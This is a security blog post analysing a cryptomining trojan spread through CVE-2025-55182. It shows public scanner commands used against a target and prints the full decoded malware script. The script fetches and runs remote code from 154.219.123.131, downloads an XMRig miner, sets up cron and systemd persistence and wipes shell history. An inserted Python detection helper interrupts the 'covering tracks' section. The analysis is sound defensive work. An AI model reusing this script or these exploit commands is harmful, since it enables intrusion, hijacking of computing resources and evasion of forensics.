CVE-2025-55182 Cryptomining Trojan Analysis
Original
By simeon
小兵搞安全
December 13, 2025, 08:00, Beijing
While reproducing CVE-2025-55182, I found that criminal groups are already exploiting it in a fully automated way: once the attack succeeds, they download a mining script and start mining on the host.
1. Reproducing the Vulnerability
1.1 Scanning to Confirm the Vulnerability
1. Download the scanner and install its dependencies
git clone https://github.com/assetnote/react2shell-scanner.git
cd react2shell-scanner
pip install -r requirements.txt
2. Run the scan
python3 scanner.py -u http://103.**.**.**:80/apps
1.2 Confirming the Vulnerability
1. CVE-2025-55182 exploitation tool
git clone https://github.com/zack0x01/CVE-2025-55182-advanced-scanner-.git
cd CVE-2025-55182-advanced-scanner-
chmod +x scanner.sh
./scanner.sh -d example.com
./scanner.sh -d http://103.**.**.**:80/apps -c "whoami"
./scanner.sh -d http://103.**.**.**:80/apps -c "ls -al /app/web"
2. Discovering the Mining Script
2.1 Viewing the Mining Script
1. View the contents of wao.sh
./scanner.sh -d http://103.**.**.**:80/apps -c "cat /app/web/wao.sh"
wao.sh contents:
#!/bin/bash
curl -s http://154.219.123.131/cxd2/waoinfo.txt | base64 -d | bash
rm wao.sh
2. Download waoinfo.txt
3. Base64-decode the encoded file
(1) Original waoinfo.txt contents
(2) Decoding the waoinfo.txt contents
The decoded content is:
#!/bin/bash
SCRIPT_PATH="$(pwd)/wao.sh"
SCRIPT_URL="http://154.219.123.131/cxd2/wao.sh"
public_ip=$(curl -4 -s ifconfig.me || curl -4 -s icanhazip.com)
if [ -z "$public_ip" ]; then exit 1; fi
public_ip=$(echo "$public_ip" | cut -d. -f3-)
if pgrep -x "xmrig" > /dev/null || pgrep -x "hash" > /dev/null; then
pkill -f xmrig
pkill -f hash
fi
if [ ! -f "hash" ]; then
curl -s -o hash http://154.219.123.131/cxd/hash
[ ! -f "hash" ] && exit 1
chmod +x ./hash
fi
setup_autostart() {
DELAYED_TASK="(sleep 200 && [ ! -f /tmp/wao_task_done ] && curl -s -o $SCRIPT_PATH $SCRIPT_URL && /bin/bash $SCRIPT_PATH && touch /tmp/wao_task_done)"
RERIODIC_TASK="[ ! -f /tmp/wao_task_done ] && /bin/bash $SCRIPT_PATH && touch /tmp/wao_task_done"
PERIODIC_TASK="curl -s -o $SCRIPT_PATH $SCRIPT_URL && /bin/bash $SCRIPT_PATH && touch /tmp/wao_task_done"
(crontab -l 2>/dev/null | grep -qF "$DELAYED_TASK") || (crontab -l 2>/dev/null; echo "@reboot $DELAYED_TASK") | crontab -
(crontab -l 2>/dev/null | grep -qF "$RERIODIC_TASK") || (crontab -l 2>/dev/null; echo "@reboot $RERIODIC_TASK") | crontab -
(crontab -l 2>/dev/null | grep -qF "0 */12 * * * $PERIODIC_TASK") || (crontab -l 2>/dev/null; echo "0 */12 * * * $PERIODIC_TASK") | crontab -
if command -v systemctl > /dev/null; then
SERVICE_FILE="$HOME/.config/systemd/user/wao.service"
TIMER_FILE="$HOME/.config/systemd/user/wao.timer"
mkdir -p "$(dirname "$SERVICE_FILE")"
cat > "$SERVICE_FILE" <<EOF
[Unit]
Description=WAO Script Auto Start Every 8 Hours
After=network-online.target
Wants=network-online.target
[Service]
ExecStartPre=/bin/sleep 20
ExecStart=/bin/bash -c "curl -s -o $SCRIPT_PATH $SCRIPT_URL && /bin/bash $SCRIPT_PATH && touch /tmp/wao_task_done"
Restart=on-failure
[Install]
WantedBy=default.target
EOF
cat > "$TIMER_FILE" <<EOF
[Unit]
Description=Run WAO Script Every 8 Hours
Requires=wao.service
[Timer]
OnUnitActiveSec=8h
Persistent=true
Unit=wao.service
[Install]
WantedBy=timers.target
EOF
systemctl --user daemon-reload
loginctl enable-linger $(whoami)
systemctl --user start wao.service
systemctl --user enable wao.timer
systemctl --user start wao.timer
systemctl --user restart wao.timer
fi
}
setup_autostart
history -c
if [ -f ~/.bash_history ]; then
rm ~/.bash_history
fi
if [ -f ~/.zsh_history ]; then
rm ~/.zsh_history
fi
exec ./hash -o auto.c3pool.org:13333 -u 46v47XHgtVpDezvKrW9XoYVt1kVQLD21scNccnuqQngkBRSnAu9wuA7WHvbK5ky49DJ29ummrDFWeF6v7aFfUkTp9JUHkNV -p "$public_ip" --randomx-1gb-pages --cpu-priority=0 --cpu-max-threads-hint=30
3. Analysis of the Mining Script
3.1 Download and Execute a Remote Script
SCRIPT_URL="http://154.219.123.131/cxd2/wao.sh"
curl -s -o $SCRIPT_PATH $SCRIPT_URL && /bin/bash $SCRIPT_PATH
Downloads wao.sh from a suspicious IP address (154.219.123.131) and executes it.
wao.sh contents:
#!/bin/bash
curl -s http://154.219.123.131/cxd2/waoinfo.txt | base64 -d | bash
rm wao.sh
This IP does not belong to any mainstream cloud provider and has no publicly known legitimate use.
3.2 Download the Miner
curl -s -o hash http://154.219.123.131/cxd/hash
chmod +x ./hash
Downloads a binary named hash (in reality a variant of the XMRig miner).
XMRig is open-source Monero mining software that is frequently abused for illicit mining.
https://s.threatbook.com/report/file/a2ad35c6baffcccc7aa93ada0f5bd48f18cb4530f0b426ded7dfcbcc5a408013?sign=history&env=ubuntu_1704_x64
3.3 Connect to the Mining Pool
exec ./hash -o auto.c3pool.org:13333 -u 46v47XHgtVpDezvKrW9XoYVt1kVQLD21scNccnuqQngkBRSnAu9wuA7WHvbK5ky49DJ29ummrDFWeF6v7aFfUkTp9JUHkNV -p "$public_ip" --randomx-1gb-pages --cpu-priority=0 --cpu-max-threads-hint=30
exec ./hash -o auto.c3pool.org:13333 -u <wallet address> -p "$public_ip" …
Connects to the pool auto.c3pool.org:13333 (part of C3Pool, a real Monero mining pool).
Payouts go to a hard-coded Monero wallet address:
46v47XHgtVpDezvKrW9XoYVt1kVQLD21scNccnuqQngkBRSnAu9wuA7WHvbK5ky49DJ29ummrDFWeF6v7aFfUkTp9JUHkNV
Uses the last two octets of the victim's public IP as the pool password (so the operator can tell which host the hash rate comes from).
3.4 Persistence (Autostart)
Via crontab:
delayed execution at boot;
re-download and re-run the script every 12 hours.
Via a systemd user service plus timer, the mining task is restarted automatically every 8 hours.
Enables linger so the user service keeps running even when the user is not logged in.
3.5 Covering Tracks
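A triage helper for the fetch-and-execute chain in 3.1 and the cron/systemd persistence in 3.4, added here as an example; it is not code from the original article or from the malware. It assumes the responder has already collected `crontab -l` output and the unit files from ~/.config/systemd/user; the crontab sample is constructed from the entries the decoded script installs, with /app/web/wao.sh assumed as the script path.

```python
# Added triage example for the persistence described in 3.4; not code from the
# article or the malware. Input is text a responder already has (crontab -l
# output, unit files under ~/.config/systemd/user).
import re
from configparser import ConfigParser

# Behavioural patterns taken from the decoded script, not a full IoC list:
#  - "curl ... | base64 -d | bash"                   (the wao.sh stage)
#  - "curl -s -o <file> <url> && /bin/bash <file>"  (cron / ExecStart stage)
DOWNLOAD_EXEC = re.compile(
    r"curl\s+[^|;&]*\|\s*base64\s+-d\s*\|\s*(?:ba)?sh"
    r"|curl\s+-s\s+-o\s+\S+\s+https?://\S+\s*&&\s*/bin/bash"
)
MARKER_FILE = "/tmp/wao_task_done"

# Constructed sample: one benign entry plus the two entries the script installs.
SAMPLE_CRONTAB = """0 2 * * * /usr/bin/certbot renew --quiet
@reboot (sleep 200 && [ ! -f /tmp/wao_task_done ] && curl -s -o /app/web/wao.sh http://154.219.123.131/cxd2/wao.sh && /bin/bash /app/web/wao.sh && touch /tmp/wao_task_done)
0 */12 * * * curl -s -o /app/web/wao.sh http://154.219.123.131/cxd2/wao.sh && /bin/bash /app/web/wao.sh && touch /tmp/wao_task_done
"""

def is_download_exec(command: str) -> bool:
    """True if a shell command line downloads and immediately executes content."""
    return DOWNLOAD_EXEC.search(command) is not None

def suspicious_cron_lines(crontab_text: str) -> list[str]:
    """Return crontab entries that fetch-and-run a script or touch the marker file."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if is_download_exec(line) or MARKER_FILE in line:
            hits.append(line)
    return hits

def suspicious_unit(unit_text: str) -> list[str]:
    """Flag the settings wao.service / wao.timer rely on (systemd INI syntax)."""
    cp = ConfigParser(strict=False, interpolation=None)
    cp.optionxform = str  # systemd keys are case-sensitive; keep them as written
    cp.read_string(unit_text)
    findings = []
    if is_download_exec(cp.get("Service", "ExecStart", fallback="")):
        findings.append("ExecStart downloads and executes a remote script")
    if cp.get("Timer", "Persistent", fallback="").lower() == "true":
        findings.append("Timer is Persistent (missed runs are made up after boot)")
    interval = cp.get("Timer", "OnUnitActiveSec", fallback="")
    if interval:
        findings.append(f"Timer re-fires every {interval} after each activation")
    return findings
```

Pair the findings with `loginctl show-user <user>` (Linger=yes) and `systemctl --user list-timers` on the host, since the script also enables linger so the timer survives logout.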
history -c
if [ -f ~/.bash_history ]; then
rm ~/.bash_history
fi
if [ -f ~/.zsh_history ]; then
rm ~/.zsh_history
fi
Clears the command history in an attempt to hide traces of the intrusion.
3.6 Kill Existing Mining Processes
pkill -f xmrig
pkill -f hash
Avoids conflicts with other miners and ensures the script's own miner has exclusive use of the CPU.